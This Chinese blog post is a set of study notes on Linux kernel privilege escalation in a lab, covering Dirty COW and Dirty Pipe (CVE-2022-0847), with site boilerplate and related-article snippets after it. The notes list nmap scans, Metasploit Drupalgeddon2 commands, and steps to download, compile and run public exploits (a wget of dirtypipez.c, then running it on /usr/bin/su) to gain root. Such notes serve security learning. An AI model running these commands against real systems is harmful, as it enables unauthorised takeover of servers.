Linux提权--内核漏洞--web用户提权(脏牛)&本地提权(脏管道)

于 2024-05-11 23:44:42 发布
阅读量638 收藏 7
点赞数 10
分类专栏: # 权限提升 文章标签: linux 运维 服务器 安全 网络 网络安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138733704
版权

免责声明:本文仅做技术交流与学习...

目录

Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow

nmap扫描目标IP及端口

导入脚本,进行探针

通过MSF发现目标机器存在脏牛漏洞

---上传信息搜集的文件,查找漏洞,利用漏洞,继续上传EXP.  

--密码改了,再用xshell连一下就行了.

Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe(CVE-2022-0847)

前提:

探针:

利用EXP:

Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow

nmap扫描目标IP及端口

nmap 192.168.46.0/24

nmap -p -65535 192.168.46.144

导入脚本,进行探针

(linux-exploit-suggester--->获取信息...)等等

通过MSF发现目标机器存在脏牛漏洞

search drupal

use exploit/unix/webapp/drupal_drupalgeddon2

set rhost 192.168.46.144

set rport 1898

run

---上线

---上传信息搜集的文件,查找漏洞,利用漏洞,继续上传EXP.  

upload /root/dcow.cpp/tmp/dcow.cpp

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

--密码改了,再用xshell连一下就行了.

Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe(CVE-2022-0847)

前提:

5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

探针:

les.sh

traitor-amd64

beroot.py

--探针出来,找EXP.

利用EXP:

wget https://haxx.in/files/dirtypipez.c

gcc -o dirtypipez dirtypipez.c

./dirtypipez /usr/bin/su         #任何具体suid权限的文件均可

id

金灰
关注
专栏目录
Linux提权脏牛漏洞(CVE-2016-5195)
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
Linux sudo 提权漏洞 CVE-2021-3156 复现 附exp
god_Zeo的安全博客
02-04 1747
0x01 CVE-2021-3156: 缓冲区溢出漏洞 在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得root权限。 0x02 影响版本 Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 不受影响版本 Sudo =>1.9.5p2 0x03 漏洞检测 测试环境:ubuntu:20.04 检测是否存在 s
权限提升-Linux脏牛内核漏洞&SUID&信息收集
xhscxj的博客
03-06 2556
一、Linux 提权自动化脚本利用-4 个脚本 两个信息收集:LinEnum,linuxprivchecker 两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2 需要解释:信息收集有什么用哦?漏洞探针又有什么用哦 LinEnum信息收集 通过webshell把LinEnum可执行文件上传到对方服务器中的tmp目录 因为tmp目录是linux服务器中的临时目录,重启后tmp目录会清空,所以这个目录一般都是可读取执行的 通过webshell执行L.
新Windows本地提权漏洞学习(CVE-2019-0841)
weixin_30402085的博客
04-16 988
1、这是一个啥漏洞? 睁眼一看,妈呀本地提权,快加入本地提权漏洞利用包里,速度加入。github连接我就不发了。担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码。 2、文件读写权限转命令执行权限! 为啥能提权,基本原理先说一下,这个漏洞可以让你拥有“文件读写权限转命令执行权限”的典型案例,利用一个低权限获取高权限文件的读写权限,即可利用恶意代码注入,劫持dll等方式赋予自...
DirtyPipe(管道)提权
weixin_45794666的博客
03-08 6886
DirtyPipe提权 CVE-2022-0847 漏洞详情 新管道缓冲区结构的“flags”成员在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化的方式存在缺陷,因此可能包含陈旧的值。非特权本地用户可通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Di
linux “大脏牛漏洞分析(CVE-2017-1000405)
whatday的专栏
10-16 5243
一、背景简介 脏牛漏洞(CVE-2016–5195)是公开后影响范围最广和最深的漏洞之一,这十年来的每一个Linux版本,包括Android、桌面版和服务器版都受到其影响。恶意攻击者通过该漏洞可以轻易地绕过常用的漏洞防御方法,对几百万的用户进行攻击。尽管已针对该漏洞进行了补丁修复,但国外安全公司Bindecy对该补丁和内容做出深入研究后发现,脏牛漏洞的修复补丁仍存在缺陷,由此产生了“大脏牛漏洞...
CVE-2022-0847 Linux管道漏洞分析
qq_42735101的博客
01-26 1033
CVE-2022-0847漏洞被一名叫Max Kellermann的安全研究员于2022年3月7日公开披露,并将该漏洞命名为The Dirty Pipe Vulnerability(管道漏洞)。
20201231WEB渗透学习之Linux内核提权
qq_45290991的博客
01-01 911
我们都知道,如果已经获取了目标服务器(网站)的后门shell,那么我们接下啦要做的事情是什么????对,就是进程迁移(把自己的shell隐藏到一个不容易被肉鸡检测到的地方,比如说一个很深的目录下),但是要执行进程迁移,我们需要root权限,所以实际上我们应该先提升攻击者的权限,来使得我们有着更高的权限(比如说root)去操控肉鸡。在提升权限的过程中,我们常常用到一个能够和肉鸡建立实时会话的TCP工具——————Netcat。网上的教程一般都是先开篇列出来这个工具的命令,然后后面接上一些实际例子,这样有好处也
Linux提权CVE-2022-0847分析
HBohan的博客
03-25 2380
漏洞利用原理: 通过pipe生成一个管道,然后使用write调用pip_write将管道填满flag为PIPE_BUF_FLAG_CAN_MERGE,然后用read将缓冲区全部释放,但是根据splice进行零拷贝时copy_page_to_iter_pipe没有将flag初始化,导致缓冲区仍然留存PIPE_BUF_FLAG_CAN_MERGE。进而在write上检测flag存在PIPE_BUF_FLAG_CAN_MERGE来达成越权写入操作。 什么是零拷贝? 零拷贝是作用于两个文件间移动,正常文件拷贝流程一
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 016-网络安全应急技术与实践(Web层-应急响应技术总结)
最新发布
时光隧道
02-11 8万+
Web安全事件应急响应技术是指针对Web应用程序遭受风险和安全漏洞的事件,如网络攻击、数据泄露、恶意软件等,迅速采取措施进行监测、分析和应对的技术手段。应急响应技术描述1. 监测和日志分析通过实时监测和分析Web应用程序的日志,以便发现异常活动和潜在的安全威胁。2. 威胁情报收集与分析收集和分析来自多个来源的威胁情报,以帮助识别和应对潜在威胁。3. 漏洞扫描和漏洞管理通过定期对Web应用程序进行漏洞扫描,及时发现和修复潜在的安全漏洞。4. 网络流量分析。
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel < 5.16.11 / 5.15.25 / 5.10.102中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
⭐⭐⭐⭐⭐Linux C++性能优化秘籍:从编译器到代码,探究高性能C++程序的实现之道
探索C++编程的奥秘,分享深入的技术见解和实践,旨在激发读者创造力与解决问题的思维。
04-06 2029
高性能C++编程涉及多个方面,包括编译器优化、C++代码性能优化基本原则、C++对象管理与性能优化、多线程编程与性能优化、Linux系统调用优化等。通过学习和掌握这些要点,程序员可以有效地提高C++程序在Linux环境下的性能。接下来的章节将对这些核心要点进行详细的介绍。
Linux管道提权
qq_43381463的博客
02-25 792
漏洞复现-DirtyPipe提权(CVE-2022-0847)
lampiao脏牛漏洞提权
vilice的博客
10-13 854
Linux提权练习
Linux脏牛漏洞提权
sGanYu
07-19 1491
通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描。退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址。首先我们使用nmap的sP参数通过ping探测已存活的主机。进入目标主机的/tmp目录,查看上传的1.sh是否存在。启动msf,通过msf搜索所有关于Drupal的漏洞。启动靶机后,默认是不给用户名、密码和IP地址的。上传漏洞收集脚本到目标主机赋予执行权限并执行。开启py终端,运行./dcow,获取密码。......
Linxu管道提权(CVE-2022-0847)
oiadkt的博客
03-03 228
Linxu管道提权(CVE-2022-0847)的两种方式,基于覆写/etc/passwd 来提权和覆盖SUID程序来提权 下载完成后使用 chmod 给与 Dirty-Pipe.sh 可以执行权限,随后运行进行提权
polkit pkexec 本地提权漏洞
sre救赎之路
05-04 992
2022年1月25日。
Windows本地提权漏洞(CVE-2021-1732)复现
玄道的网安博客
04-13 2192
漏洞概述 该漏洞由函数win32kfull!xxxCreateWi ndowEx 对应用层回调返回数据校验不严导致,本地用户执行漏洞利用程序获取系统权限。 影响版本 Windows Server, version 20H2 (Server Core Installation) Windows 10 Version 20H2 for ARM64-based Systems Windows 10 Version 20H2 for 32-bit Systems Windows 10 Versi..
脏牛提权漏洞复现(CVE-2016-5159)
1匹黑马
02-22 1577
文章目录影响范围危害漏洞原理漏洞利用 影响范围 Linux kernel >= 2.6.22(2007年发行,到2016年10月18日前所有发行版本) 危害 普通权限用户执行编译后的exp直接提权成root用户 漏洞原理 get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区...
Linux提权攻略:从信息收集到内核漏洞利用
"这篇文档是关于Linux提权的深度指南,涵盖了多种权限提升技术,包括信息收集、内核漏洞利用、服务权限滥用等,并强调了权限升级在攻防中的重要性。作者提醒读者,该文仅供学习研究,禁止非法攻击。" 在Linux系统中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值